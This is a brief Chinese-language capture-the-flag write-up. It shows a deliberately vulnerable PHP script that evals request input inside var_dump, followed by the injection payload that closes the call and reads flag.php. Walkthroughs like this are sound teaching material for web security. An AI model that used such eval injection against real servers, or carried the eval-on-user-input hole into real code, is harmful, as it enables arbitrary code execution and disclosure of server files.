<?php
include "flag.php";
$a = @$_REQUEST['hello'];//a从get、post获取hello值。
eval( "var_dump($a);"); //var_dump()打印显示,eval()闭合这个程序
show_source(__FILE__); //该段不解析作为一个字符串原样输出
?>
现在我们要使flag.php执行并通过show_source(__FILE__);显示
针对var_dump()进行操作 首先将他闭合
hello=);
然后我们要执行flag.php 用print_r()打印字符串本身 file()读取文件内容
hello=);print_r(file("./flag.php")